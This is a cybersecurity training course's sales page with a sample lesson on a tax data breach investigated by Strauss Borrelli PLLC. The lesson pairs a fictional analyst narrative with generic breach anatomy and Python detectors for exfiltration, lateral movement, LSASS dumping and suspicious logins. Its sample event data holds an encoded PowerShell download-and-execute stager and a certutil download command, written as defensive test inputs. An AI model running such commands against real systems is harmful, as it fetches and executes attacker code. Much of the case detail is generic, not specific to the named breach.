Incident-as-a-Service

CSA Tax Data Breach Investigation - Strauss Borrelli PLLC

The 48-Hour Rule in action: this incident happened, we converted it into operational training, and your team can apply the controls immediately.

73% vs 12% Retention Lift
18.5h Breach to Training
847 Organisations
48h Action Window
Built for:
  • Security Analyst: To develop advanced detection strategies for data exfiltration and learn to create actionable threat intelligence from breach reports.
  • IT Administrator / System Engineer: To understand infrastructure hardening techniques, including access control and network segmentation, to prevent unauthorised data access.
  • Compliance Officer / Risk Manager: To learn how to map specific breach scenarios to control requirements in frameworks like GDPR and NIST CSF for effective audit and reporting.

30-day guarantee. Instant access after payment. Lifetime updates for this incident package.

How This Course Is Structured

Clear progression from incident context to practical controls and role-specific action steps.

1. Incident Breakdown

Attack path, trigger conditions, and threat actor behaviour translated from the real event timeline.

2. Defensive Controls

Actions your team can implement in the same 48-hour response window used by active security teams.

3. Evidence & Reporting

Completion records and learning outcomes packaged for governance, insurance, and audit workflows.

Course Outline

4 modules · 16 lessons · ~720 min total (16 lessons of ~45 min)


Module 1: Threat Intelligence

Deep dive into the incident mechanics, attack vectors, and threat actor analysis. Learn to recognise indicators of compromise.

4 lessons ~180 min
📖 1.1 CSA Tax Data Breach Investigation - Strauss Borrelli PLLC Deep Dive 45 min
📖 1.2 Data Breach Campaign Analysis and Attribution 45 min
📖 1.3 Data Breach Attack Vector Analysis 45 min
📖 1.4 Data Breach Indicators of Compromise 45 min
📖 2.1 SIEM Detection Strategies for Data Exfiltration 45 min
📖 2.2 Endpoint Detection and Analysis for Data Theft 45 min
📖 2.3 Data Breach Incident Response Playbook 45 min
📖 2.4 Digital Forensics Essentials for Data Breaches 45 min
📖 3.1 Authentication Hardening Against Credential Theft 45 min
📖 3.2 Access Control Implementation for Data Protection 45 min
📖 3.3 Network Segmentation to Limit Data Movement 45 min
📖 3.4 Zero Trust Architecture for Data-Centric Security 45 min
📖 4.1 Data-Centric Security Awareness Programme 45 min
📖 4.2 Board-Level Communication on Breach Risk 45 min
📖 4.3 Vendor Risk Management for Data Processors 45 min
📖 4.4 Compliance Framework Integration for Data Breaches 45 min

Free Sample Lesson

Read one full lesson before purchasing. No signup required.


Lesson 1 of 16

Lesson 1.1: CSA Tax Data Breach Investigation - Strauss Borrelli PLLC Deep Dive

Compliance Framework Mapping

Framework   Control          Requirement
DORA        Articles 5-17    ICT risk management framework requirements
ISO 27001   A.5              Information security policies
NIST CSF    ID.RA-1          Asset vulnerabilities are identified and documented
NIS2        Article 21       Risk management measures for network and information systems
SOC 2       CC1.1            The entity demonstrates commitment to integrity and ethical values
GDPR        Article 32       Security of processing

Introduction

Welcome to Lesson 1.1: CSA Tax Data Breach Investigation - Strauss Borrelli PLLC Deep Dive! Over the next 45 minutes, we will explore the anatomy of a major data breach, focusing on the investigation led by the law firm Strauss Borrelli PLLC and the threat intelligence lessons we can draw from it.

But first, let me tell you about Marcus Webb.

It's 3:17 PM on a Tuesday in late October. Marcus Webb, a senior IT security analyst at a mid-sized financial services firm in London, is reviewing the latest batch of automated alerts. The office is quiet, the only sound the hum of servers from the adjacent data room and the faint tapping of his keyboard. He sips cold coffee, his eyes scanning lines of log data on the central monitoring dashboard.

A cluster of alerts from the customer database server catches his eye. They're flagged as 'unusual login attempts' but the pattern is odd—they originate from an internal IP address, one used by the development team. The timestamps show activity over the weekend, which is unusual but not impossible. He makes a note to check with the dev lead later. The system hasn't flagged it as critical, and his dashboard is already cluttered with similar medium-priority warnings.

He dismisses the alert group, marking it for follow-up. It's a decision based on workload and a system that cried wolf too often. He doesn't know that the internal IP has been compromised for weeks, that the 'unusual logins' were a threat actor methodically mapping the database schema, and that the real exfiltration of sensitive customer tax data began 48 hours ago, masked as legitimate backup traffic.

This is the story of a Data Breach. By the end of this lesson, you'll understand exactly why Marcus never stood a chance, and more importantly, what could have saved him.


Content Section 1: What is the CSA Tax Data Breach?

Think of a data breach not as a single event, but as a slow-motion burglary. The thief isn't smashing a window; they're copying your house key, learning your schedule, and moving your valuables out one piece at a time while you're home. The CSA breach, investigated by Strauss Borrelli PLLC, followed this exact pattern.

The Nature of the Compromise

The breach involved unauthorised access to systems holding sensitive taxpayer information. The investigation by Strauss Borrelli PLLC, a firm specialising in data breach litigation and response, would have focused on determining the scope, source, and legal implications of the access.

In such breaches, the target is often data with high resale value on criminal forums or data that can be used for targeted fraud. Tax data is particularly attractive because it contains names, addresses, social security or national insurance numbers, and financial details—a complete kit for identity theft.

The legal investigation aims to establish liability, notify affected parties as required by law, and coordinate with regulators. The firm's deep dive would dissect the timeline, the point of entry, and the security failures that allowed the breach to occur and persist.

The Investigation's Role as Threat Intelligence

The findings from a firm like Strauss Borrelli PLLC become a rich source of threat intelligence. They document not just the 'what' but the 'how'—the specific tactics, techniques, and procedures (TTPs) used by the threat actors.

This intelligence is valuable because it moves beyond generic warnings. It provides concrete indicators of compromise (IoCs), such as specific malware hashes, command-and-control server domains, or unusual data access patterns, that other organisations can use to hunt for similar activity in their own networks.

Think about that last point for a moment. A legal investigation isn't just about assigning blame; it's a forensic reconstruction that reveals the exact moments standard security assumptions failed.

DORA Articles 5-17: DORA's ICT risk management framework requires financial entities to have processes for learning from incidents. Analysing detailed breach investigations like this one feeds directly into updating threat landscapes and control measures.

ISO 27001 A.5: control A.5 on information security policies requires that policies are reviewed at planned intervals or when significant changes occur, a changing threat picture included. Intelligence from real-world breaches provides the evidence needed to justify and direct those policy reviews.



Content Section 2: The Attack Anatomy

Understanding the typical flow of a data breach reveals why it's so effective. Let me show you exactly how an attacker, in a scenario like the one Marcus faced, operates.

The Breach Lifecycle

First, initial access. This rarely starts with a direct attack on a fortified database. It often begins with a phishing email to a developer, leading to compromised credentials for a less-secure system, like a code repository or a project management tool. From that initial foothold, the attacker moves laterally.

Second, discovery and persistence. Once inside, the attacker uses the stolen credentials to explore the network, often using legitimate IT admin tools to avoid detection. They seek out database servers, file shares, and backup systems. They may install a lightweight backdoor to maintain access even if the initial compromised account is reset.

Third, collection and exfiltration. The attacker identifies the target data—in this case, tax records. They often compress and encrypt the data inside the network before sending it out. Exfiltration is masked to look like normal traffic, such as outbound HTTPS connections to cloud storage or large, scheduled 'backup' transfers.

Key Technical Components

Attackers rely on living-off-the-land binaries (LOLBins), legitimate system tools like PowerShell, WMI, or certutil, to perform malicious actions. This makes their behaviour blend in with normal admin activity.

Data is often staged in a compressed archive on an internal server with high outbound bandwidth before being transferred. The use of common ports and protocols for exfiltration makes it difficult to block without disrupting business.

Why Traditional Defences Fail

Defensive method               | How it's bypassed                                                                                          | Result
Perimeter firewall             | Attack originates from a compromised internal asset; exfiltration uses allowed HTTPS (TLS) ports.          | Traffic appears legitimate.
Signature-based AV/IDS         | Attackers use custom malware or no malware at all, relying on scripts and LOLBins.                         | No known signature to detect.
Weekly vulnerability scans     | Breach exploits misconfigurations, weak credentials, or authorised user access, not just unpatched CVEs.   | Scan shows a 'compliant' system.
SIEM alerting on single events | Attack actions are low-and-slow, each step benign on its own, only malicious in sequence.                  | Alerts are low priority and get dismissed.

Notice what all of these methods have in common: they focus on preventing a loud, obvious intrusion. A modern data breach is a silent, patient process that abuses normal system functions, which is why the controls Marcus likely relied on never stopped it.

Now pay attention, because this is the moment that matters. The stolen data leaves inside encrypted HTTPS sessions, and the attacker has often encrypted the staged archive as well, so even a proxy that inspects TLS sees an opaque blob heading to a common cloud service. Your firewall sees allowed, encrypted traffic to a reputable destination. This is the moment where traditional perimeter defences become blind; volume, timing and destination are the only signals left.

NIST CSF ID.RA-1: ID.RA-1 requires that asset vulnerabilities are identified and documented. This attack anatomy shows that vulnerabilities aren't just software flaws; they include misconfigurations, excessive user privileges, and weak detection capabilities, all of which must be in scope for assessment.

NIS2 Article 21: Article 21 mandates risk management measures. Understanding this attack flow demonstrates that measures must address the entire attack chain, from initial access to exfiltration, not just the perimeter.



Content Section 3: Detection: Seeing What Marcus Missed

Marcus's monitoring system knew something was wrong. It just couldn't tell him clearly. The signals were there, buried in noise. Here's what a threat intelligence-led detection strategy looks for.

Network-Level Indicators

Look for internal lateral movement that doesn't match normal user behaviour. A developer's account accessing a database server it has no business need for. A server making SMB or RDP connections to multiple other servers in a short timeframe.

Monitor for large, outbound data transfers, especially outside business hours. Even over HTTPS, the volume and timing can be a signal. A server that normally sends 50MB of logs per day suddenly pushing 15GB to an external IP is a major red flag.

DNS query analysis can reveal beaconing to command-and-control servers. Look for repeated queries for suspicious or newly registered domains from internal assets, particularly non-user endpoints like servers.
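The three network-level signals above (egress far above a host's own baseline, admin-protocol fan-out from a single source, and DNS lookups at near-constant intervals) can each be checked with a few lines of code. The Python below is an added example written for this lesson; it is not tooling from the Strauss Borrelli PLLC investigation or from any vendor. The flow and DNS records are constructed to mirror the Marcus scenario, and the internal IP ranges, domain names, admin ports and thresholds are assumptions you would tune for your own estate.

```python
"""Network-level indicator checks over constructed flow and DNS logs.

Added example for this lesson, not code from the investigation or a vendor.
Every record, address, domain and threshold below is constructed or assumed.
"""
from collections import defaultdict
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network
from statistics import mean, median, pstdev

INTERNAL = [ip_network("10.0.0.0/8"), ip_network("192.168.0.0/16")]  # assumed ranges

def is_internal(ip):
    return any(ip_address(ip) in net for net in INTERNAL)

# Constructed flows: (timestamp, src_ip, dst_ip, dst_port, bytes_out)
FLOWS = [
    # db-srv 10.0.1.20 ships ~50 MB of logs to a SIEM relay every night
    ("2024-10-21T02:00:00", "10.0.1.20", "203.0.113.10", 443, 50_000_000),
    ("2024-10-22T02:00:00", "10.0.1.20", "203.0.113.10", 443, 52_000_000),
    ("2024-10-23T02:00:00", "10.0.1.20", "203.0.113.10", 443, 48_000_000),
    ("2024-10-24T02:00:00", "10.0.1.20", "203.0.113.10", 443, 51_000_000),
    # Saturday 03:10: 15 GB to a never-seen external IP, dressed up as "backup"
    ("2024-10-26T03:10:00", "10.0.1.20", "198.51.100.7", 443, 15_000_000_000),
    # dev workstation touching six servers over SMB/RDP within eight minutes
    ("2024-10-19T22:01:00", "10.0.5.77", "10.0.1.20", 445, 4096),
    ("2024-10-19T22:02:00", "10.0.5.77", "10.0.1.21", 445, 4096),
    ("2024-10-19T22:03:00", "10.0.5.77", "10.0.1.22", 3389, 8192),
    ("2024-10-19T22:05:00", "10.0.5.77", "10.0.1.23", 445, 4096),
    ("2024-10-19T22:06:00", "10.0.5.77", "10.0.1.24", 445, 4096),
    ("2024-10-19T22:08:00", "10.0.5.77", "10.0.1.25", 3389, 8192),
    # benign: file server talking to a single domain controller
    ("2024-10-19T22:04:00", "10.0.1.30", "10.0.0.5", 445, 4096),
]

# Constructed DNS log: (timestamp, client_ip, queried_name). The first series
# recurs every ~300 s with small jitter; the second is ordinary user browsing.
DNS = [("2024-10-20T10:%02d:%02d" % ms, "10.0.1.20", "cdn-sync.example")
       for ms in [(0, 0), (5, 2), (9, 58), (15, 1), (20, 0), (24, 59), (30, 2)]]
DNS += [("2024-10-20T09:%02d:%02d" % ms, "10.0.5.12", "news.example")
        for ms in [(0, 0), (1, 10), (7, 30), (8, 0), (30, 0), (31, 45)]]

def egress_spikes(flows, factor=10):
    """(host, day, bytes, ratio) where one day's external egress exceeds
    factor x the median of that host's other days (needs >= 3 days)."""
    daily = defaultdict(lambda: defaultdict(int))
    for ts, src, dst, _, nbytes in flows:
        if is_internal(src) and not is_internal(dst):
            daily[src][datetime.fromisoformat(ts).date()] += nbytes
    hits = []
    for host, per_day in daily.items():
        if len(per_day) < 3:
            continue
        for day, total in per_day.items():
            base = median(v for d, v in per_day.items() if d != day)
            if total > factor * base:
                hits.append((host, day.isoformat(), total, round(total / base, 1)))
    return hits

def lateral_fanout(flows, ports=(445, 3389), window=timedelta(minutes=10), threshold=5):
    """(src, start, n) where one internal source reaches >= threshold distinct
    internal hosts over admin protocols inside a sliding window."""
    by_src = defaultdict(list)
    for ts, src, dst, port, _ in flows:
        if port in ports and is_internal(src) and is_internal(dst):
            by_src[src].append((datetime.fromisoformat(ts), dst))
    hits = []
    for src, events in by_src.items():
        events.sort()
        for i, (t0, _) in enumerate(events):
            targets = {d for t, d in events[i:] if t - t0 <= window}
            if len(targets) >= threshold:
                hits.append((src, t0.isoformat(), len(targets)))
                break  # one alert per source is enough
    return hits

def beacon_candidates(dns, min_queries=6, max_cv=0.1):
    """(client, name, mean_gap_s, cv) for lookups at near-constant intervals;
    a low coefficient of variation of the gaps is the shape of C2 beaconing."""
    series = defaultdict(list)
    for ts, client, name in dns:
        series[(client, name)].append(datetime.fromisoformat(ts))
    hits = []
    for (client, name), times in series.items():
        if len(times) < min_queries:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        cv = pstdev(gaps) / mean(gaps)
        if cv <= max_cv:
            hits.append((client, name, round(mean(gaps)), round(cv, 3)))
    return hits

if __name__ == "__main__":
    print(egress_spikes(FLOWS), lateral_fanout(FLOWS), beacon_candidates(DNS), sep="\n")
```

On this data only the database server's Saturday transfer (about 300 times its nightly median) and the developer workstation's six-host fan-out fire, and the server's five-minute lookups stand out while the user's browsing does not. The baseline is per host and relative, which is the point: 15 GB from a backup appliance is normal, 15 GB from a database server that usually ships 50 MB is not, and no single flow record tells you that.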

Endpoint-Level Indicators

Process lineage is key. Why is a Microsoft Word document spawning a PowerShell process? Why is PowerShell downloading a file from an internal server? Tools that track parent-child process relationships can spot these anomalous chains.

Look for evidence of credential dumping: a process that is not part of Windows or your security stack opening a handle to lsass.exe with memory-read rights (Sysmon Event ID 10 records the source process and the granted access mask), or the presence of tools like Mimikatz, or their signatures in memory, on a workstation or server. Also monitor for the installation of persistence mechanisms such as new scheduled tasks or services.
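The endpoint indicators above, together with the LOLBin behaviour described in the attack anatomy, reduce to checks on a handful of Windows event fields. The Python below is an added example written for this lesson, not code from the investigation or from any EDR product. The Sysmon-style events are constructed around the Marcus scenario: an Office document spawning PowerShell with an encoded command, certutil pulling a file, a dropped binary reading LSASS memory, and a scheduled task for persistence. Hostnames, paths, the stager payload and the LSASS allowlist are assumptions.

```python
"""Endpoint indicator checks over constructed Sysmon/Windows events.

Added example for this lesson, not code from the investigation or a vendor.
Hosts, paths, the staged binary and the encoded command are all constructed.
"""
import base64
import re

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
# Processes that routinely open lsass.exe on this (assumed) estate; tune per fleet.
LSASS_ALLOW = {r"c:\windows\system32\csrss.exe", r"c:\windows\system32\wininit.exe",
               r"c:\windows\system32\svchost.exe"}
PROCESS_VM_READ = 0x0010  # access right every LSASS memory dumper has to request

# Constructed stager of the kind hidden behind -EncodedCommand (base64 of UTF-16LE)
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://10.0.5.77:8080/stage.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()

EVENTS = [  # id 1 = Sysmon ProcessCreate, 10 = ProcessAccess, 4698 = task created
    {"id": 1, "host": "ws-dev-07", "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    {"id": 1, "host": "ws-dev-07", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -urlcache -split -f http://10.0.5.77:8080/t.exe C:\Users\Public\t.exe"},
    {"id": 1, "host": "ws-ops-02", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-Service -Name Spooler"},
    {"id": 10, "host": "ws-dev-07", "source": r"C:\Users\Public\t.exe",
     "target": r"C:\Windows\system32\lsass.exe", "granted": "0x1010"},
    {"id": 10, "host": "ws-dev-07", "source": r"C:\Windows\system32\svchost.exe",
     "target": r"C:\Windows\system32\lsass.exe", "granted": "0x1400"},
    {"id": 4698, "host": "ws-dev-07", "name": r"\Microsoft\Windows\SyncUpdate",
     "command": r"C:\Users\Public\t.exe"},
]

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def decode_encoded_command(cmdline):
    """Decode a PowerShell -e/-ec/-enc/-EncodedCommand argument; None if absent."""
    m = re.search(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def suspicious_lineage(events):
    """Office application spawning a script host, with the decoded payload
    when the child was launched via an encoded command."""
    hits = []
    for e in events:
        if e["id"] == 1 and basename(e["parent"]) in OFFICE and basename(e["image"]) in SCRIPT_HOSTS:
            hits.append((e["host"], f"{basename(e['parent'])} -> {basename(e['image'])}",
                         decode_encoded_command(e["cmdline"]) or ""))
    return hits

def lolbin_downloads(events):
    """LOLBin fetches: certutil -urlcache, or PowerShell whose (decoded)
    command line pulls content over the network."""
    hits = []
    for e in events:
        if e["id"] != 1:
            continue
        img, cmd = basename(e["image"]), e["cmdline"]
        text = cmd + " " + (decode_encoded_command(cmd) or "")
        if img == "certutil.exe" and re.search(r"-urlcache|-verifyctl", cmd, re.I):
            hits.append((e["host"], img, cmd))
        elif img in {"powershell.exe", "pwsh.exe"} and re.search(
                r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient", text, re.I):
            hits.append((e["host"], img, text.strip()))
    return hits

def lsass_access(events):
    """Sysmon event 10: a process outside the allowlist opened lsass.exe with
    PROCESS_VM_READ set (Mimikatz-style dumpers ask for 0x1010 or 0x1410)."""
    return [(e["host"], e["source"], e["granted"]) for e in events
            if e["id"] == 10 and basename(e["target"]) == "lsass.exe"
            and e["source"].lower() not in LSASS_ALLOW
            and int(e["granted"], 16) & PROCESS_VM_READ]

def new_persistence(events):
    """Windows Security 4698 (scheduled task created) / System 7045 (service installed)."""
    return [(e["host"], e["id"], e["name"], e["command"]) for e in events if e["id"] in (4698, 7045)]

if __name__ == "__main__":
    for fn in (suspicious_lineage, lolbin_downloads, lsass_access, new_persistence):
        print(fn.__name__, "->", fn(EVENTS))
```

Decoding the encoded command before matching matters: the raw command line contains no URL and no download cmdlet, so a rule that only inspects the visible arguments misses it. Likewise, the LSASS check keys on the access mask rather than on a tool name, which is what survives when the attacker brings a renamed or custom dumper instead of Mimikatz.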

Identity and Access Signals

A core signal is logins from unusual locations or times. An account used only in London logging in from a foreign IP, or a service account logging in interactively late at night.

Monitor for privilege escalation. A standard user account being added to a privileged group like Domain Admins, or a spike in the use of privileged accounts for routine tasks. Also, look for a single account accessing a high volume of sensitive files or database records in a short period—the 'collection' phase of the attack.
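The identity signals above, and the lesson of this whole section that detection depends on sequence rather than single events, come together in the Python below. It is an added example written for this lesson, not code from the investigation or from any SIEM product. The VPN, database-audit, directory and egress records are constructed around the Marcus scenario, and the account names, hosts, sensitive groups, thresholds and time windows are assumptions. The final function answers the kind of question the Activity in this lesson asks you to formulate: can a login from an unusual country be tied to that account reaching a database server within 30 minutes, and to a bulk transfer from that server afterwards?

```python
"""Identity signals and event-sequence correlation over constructed logs.

Added example for this lesson, not code from the investigation or a vendor.
Users, hosts, countries, thresholds and windows below are constructed/assumed.
"""
from collections import defaultdict
from datetime import datetime, timedelta

SENSITIVE_GROUPS = {"domain admins", "enterprise admins", "schema admins"}

# Constructed event stream: VPN, database audit, directory and egress logs merged
EVENTS = [
    {"ts": "2024-10-14T09:00:00", "type": "vpn_login", "user": "dev.jsmith", "country": "GB"},
    {"ts": "2024-10-15T09:02:00", "type": "vpn_login", "user": "dev.jsmith", "country": "GB"},
    {"ts": "2024-10-15T10:00:00", "type": "db_query", "user": "dba.rlee", "host": "db-srv-01", "rows": 120},
    {"ts": "2024-10-15T10:30:00", "type": "vpn_login", "user": "dba.rlee", "country": "GB"},
    # weekend: same developer account, new country, then bulk reads of the tax tables
    {"ts": "2024-10-19T21:40:00", "type": "vpn_login", "user": "dev.jsmith", "country": "RO"},
    {"ts": "2024-10-19T21:58:00", "type": "db_query", "user": "dev.jsmith", "host": "db-srv-01", "rows": 40_000},
    {"ts": "2024-10-19T22:03:00", "type": "db_query", "user": "dev.jsmith", "host": "db-srv-01", "rows": 65_000},
    {"ts": "2024-10-19T23:15:00", "type": "group_add", "actor": "svc-backup", "user": "dev.jsmith", "group": "Domain Admins"},
    # two nights later: 15 GB leaves the database server as a "backup"
    {"ts": "2024-10-21T22:10:00", "type": "egress", "host": "db-srv-01", "dst": "198.51.100.7", "bytes": 15_000_000_000},
]

def _ts(e):
    return datetime.fromisoformat(e["ts"])

def unusual_country_logins(events, min_history=2):
    """Logins from a country the account has never used, once it has at
    least min_history earlier logins to compare against."""
    seen = defaultdict(list)
    hits = []
    for e in sorted(events, key=_ts):
        if e["type"] != "vpn_login":
            continue
        history = seen[e["user"]]
        if len(history) >= min_history and e["country"] not in history:
            hits.append((e["user"], e["ts"], e["country"]))
        history.append(e["country"])
    return hits

def privilege_changes(events):
    """Additions to sensitive directory groups, with the actor that made them."""
    return [(e["ts"], e["actor"], e["user"], e["group"]) for e in events
            if e["type"] == "group_add" and e["group"].lower() in SENSITIVE_GROUPS]

def bulk_record_access(events, threshold=50_000, window=timedelta(minutes=30)):
    """One account reading more than threshold rows from one host inside the
    window: the collection phase, invisible if each query is judged alone."""
    per_user = defaultdict(list)
    for e in events:
        if e["type"] == "db_query":
            per_user[e["user"]].append((_ts(e), e["host"], e["rows"]))
    hits = []
    for user, reads in per_user.items():
        reads.sort()
        for i, (t0, host, _) in enumerate(reads):
            total = sum(r for t, h, r in reads[i:] if h == host and t - t0 <= window)
            if total > threshold:
                hits.append((user, host, t0.isoformat(), total))
                break
    return hits

def correlate(events, login_to_db=timedelta(minutes=30),
              db_to_egress=timedelta(hours=72), egress_min=1_000_000_000):
    """Chain: unusual-country login -> same account queries a database host
    within login_to_db -> that host sends >= egress_min bytes out within
    db_to_egress. Each link is medium severity alone; the chain is critical."""
    events = sorted(events, key=_ts)
    chains = []
    for user, login_ts, country in unusual_country_logins(events):
        t_login = datetime.fromisoformat(login_ts)
        dbs = [e for e in events if e["type"] == "db_query" and e["user"] == user
               and timedelta(0) <= _ts(e) - t_login <= login_to_db]
        for db in dbs[:1]:  # the first database host touched is the pivot
            egress = [e for e in events if e["type"] == "egress" and e["host"] == db["host"]
                      and timedelta(0) <= _ts(e) - _ts(db) <= db_to_egress and e["bytes"] >= egress_min]
            if egress:
                chains.append({"severity": "critical", "user": user, "login": login_ts, "country": country,
                               "db_host": db["host"], "egress_ts": egress[0]["ts"], "egress_bytes": egress[0]["bytes"]})
    return chains

if __name__ == "__main__":
    for fn in (unusual_country_logins, privilege_changes, bulk_record_access, correlate):
        print(fn.__name__, "->", fn(EVENTS))
```

Run on its own, each detector produces exactly the kind of medium-priority alert Marcus dismissed: one odd login, one large query, one group change. The correlation joins them on the account and then on the host, across sources that normally live in different consoles, and the egress that looked like backup traffic becomes the last link in a chain that started with a weekend VPN session from a country the account had never used.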

SOC 2 CC1.1: CC1.1 on integrity and ethical values requires a control environment that deters and detects wrongdoing. Implementing these specific detection mechanisms demonstrates a proactive commitment to identifying malicious activity, not just relying on preventive controls.

GDPR Article 32: Article 32 requires appropriate security of personal data, including 'the ability to ensure the ongoing confidentiality, integrity, availability and resilience of processing systems and services.' Effective detection capabilities are necessary to ensure that confidentiality and integrity breaches are identified in a timely manner.


Activity: Threat Intelligence Gap Analysis

This activity will help you evaluate your organisation's detection capabilities against the specific TTPs used in a data breach like the one we've studied.

Important Security Note: Do NOT document or share specific findings about actual vulnerabilities, security gaps, or network configurations from your organisation. This is a high-level assessment to guide internal discussions with your security team.

Instructions

Step 1: Review the Attack Flow: Re-read the 'Attack Anatomy' section, focusing on the three phases: Initial Access, Discovery/Persistence, and Collection/Exfiltration.

Step 2: Map Your Controls: For each phase, write down one or two primary security controls or monitoring tools your organisation currently has in place. (e.g., For 'Initial Access': we have phishing awareness training and email filtering).

Step 3: Identify the Gap: For each phase, ask: 'If an attacker used the exact method described in this lesson, would our control reliably detect or prevent it?' Note where you are unsure or where controls seem focused on prevention but not detection.

Step 4: Formulate a Question: Based on your biggest gap, write one specific, actionable question for your security or IT team. (e.g., 'Can our SIEM correlate a user's VPN login from Country X with their access to the customer database server within 30 minutes?').

Submission

For the course discussion forum, share general learnings only:

  • Which phase of the attack (Access, Persistence, or Exfiltration) seemed hardest for your imagined controls to detect?
  • What type of question proved most valuable to formulate for your security team?
  • Did reviewing a specific breach investigation make this assessment feel more concrete than a generic checklist?

Do NOT share: your organisation's name, specific security tools in use, identified security gaps, internal network details, or any hypothetical vulnerabilities.

Review and comment on at least two other students' submissions, focusing on the structure of their questions and whether they avoid sharing sensitive information.


Content Section 4: Building Your Compliance Evidence

Compliance documentation often feels like filling out forms for an exam you never took. But after this lesson, you've sat through a masterclass on a real-world test. Your notes aren't just paperwork; they're proof of understanding.

Evidence Generation

This lesson provides documentation for multiple compliance frameworks:

For DORA auditors (Articles 5-17): you can now demonstrate that key personnel have undergone training on specific data breach TTPs relevant to the financial sector, contributing to your ICT risk management framework.

For ISO 27001 assessors (A.5): you can evidence that information security awareness training includes current, real-world threat scenarios (like data exfiltration techniques), informing the ongoing review of security policies.

For NIST CSF reviewers (ID.RA-1): you can show that your threat identification process incorporates analysis of real breach investigations to understand vulnerabilities beyond software flaws, such as detection gaps and credential misuse.

Audit Trail

Document your completion of this lesson:

  • Lesson title and date completed
  • Time invested: approximately 45 minutes
  • Key learnings in your own words
  • Activity submission reference
  • Follow-up actions identified (e.g., question for security team from Activity)

Conclusion

Let me tell you how Marcus's story ended.

The breach was discovered six weeks later by an external fraud monitoring service, not by internal tools. By then, over 100,000 customer records had been exfiltrated. Marcus's organisation faced regulatory fines, mandatory credit monitoring for affected customers, and significant reputational damage. An internal review found Marcus had followed procedure, but the procedure was based on outdated threat models. He left the company a few months later.

The organisation eventually hired a threat intelligence firm, implemented user and entity behaviour analytics (UEBA), and began regular 'purple team' exercises where defenders actively hunted for the TTPs used in recent industry breaches. They learned to look for sequences of events, not just single alerts.

But it doesn't have to be your story. That's why we're here.

You should now understand the slow, methodical nature of a modern data breach. You understand why traditional, perimeter-focused defences are insufficient. You know the key behavioural and technical indicators that signal such an attack is in progress. And you understand how breach investigations provide the concrete threat intelligence needed to build better defences.

Next up is Lesson 1.2: Data Breach Campaign Analysis and Attribution. Later in the course, Module 2 translates the indicators from this lesson into concrete SIEM rules, logging requirements, and hunting hypotheses you can propose in your organisation.

See you there.


Key Takeaways

1. Breach Investigations are Intelligence Gold: Detailed legal and forensic investigations, like those conducted by firms such as Strauss Borrelli PLLC, provide the specific Tactics, Techniques, and Procedures (TTPs) and Indicators of Compromise (IoCs) that are most valuable for building proactive defences.

2. The Attack is a Process, Not an Event: Modern data breaches are characterised by slow, lateral movement and the abuse of legitimate tools and credentials, making them invisible to security controls that only look for loud, obvious intrusions.

3. Detection Relies on Behaviour and Sequence: Effective detection focuses on anomalous sequences of behaviour—like a compromised user account moving to a database server and then generating large outbound transfers—rather than isolated security events.

4. Compliance and Defence Align: Training on real-world breach scenarios and implementing detection for their specific TTPs generates direct evidence for multiple compliance frameworks (DORA, NIST, ISO 27001), turning regulatory requirements into operational security improvements.


Resources

The course materials folder contains downloadable resources for this lesson:

  • Lesson 1.1 Quick Reference Card - Summarise the key detection indicators for data breach attacks (lateral movement patterns, exfiltration signals, credential misuse) and immediate investigative steps on a single page.
  • Compliance Mapping Worksheet - Map the specific data breach TTPs from this lesson to control requirements in the DORA, ISO 27001, NIST CSF, NIS2, SOC 2, and GDPR frameworks.
  • Risk Assessment Template - Assess your organisation's exposure to data breach threats based on the attack vectors covered, focusing on detection gaps in lateral movement and data exfiltration.
  • Further reading - Links to the MITRE ATT&CK framework (for TTP mapping), and guidance from NCSC and ENISA on detecting and responding to data breaches.

CSA Tax Data Breach Investigation - Strauss Borrelli PLLC Defence Masterclass | Threat Intelligence | Lesson 1.1
© LimitedView Limited | 2026

This is 1 of 16 lessons included in the full package.

Enrol Now — Unlock All Lessons

Want to track your progress? Create a free account

Choose Your Access

All plans include 30-day money-back guarantee

Taster

£ 19

Single course access — ideal for trying us out

  • Full course access
  • Completion certificate
  • Try before you commit

Or get everything

Access every course in the catalogue, including all future courses

£ 29 /mo
Monthly All-Access

Every course, cancel anytime

£ 249 /yr
Annual All-Access

Save 28% — £20.75/month effective

Teams

Transparent pricing, no sales call required

Starter Team

£ 499 /year

£99.80/seat effective

Up to 5 learners, all courses included

Growth Team

£ 999 /year

£66.60/seat effective

Up to 15 learners, all courses included

Scale Team

£ 1999 /year

£39.98/seat effective

Up to 50 learners, all courses included

Need 50+ seats? Contact us for a custom plan.

Fast Checkout

Start Learning in Minutes

Enter your details, choose a tier, and complete secure checkout. Access starts immediately after payment confirmation.

  • Stripe-secured payment and delivery workflow
  • Audit-friendly completion records
  • Escalate to enterprise volume licensing at any point

48-Hour Relevance Guarantee

If this course does not provide at least five actionable controls your team can deploy quickly, request a full refund within 30 days.


Not ready to purchase? Create a free account to browse and track progress.

Questions Before You Enrol?

  • Immediately after successful payment. Your learning link is generated and delivered in the success flow.
  • Yes. Content is incident-led but written for practical execution across security, IT, finance, and operations personas.
  • Yes. Use volume licensing for 10 to 500+ seats through enterprise onboarding.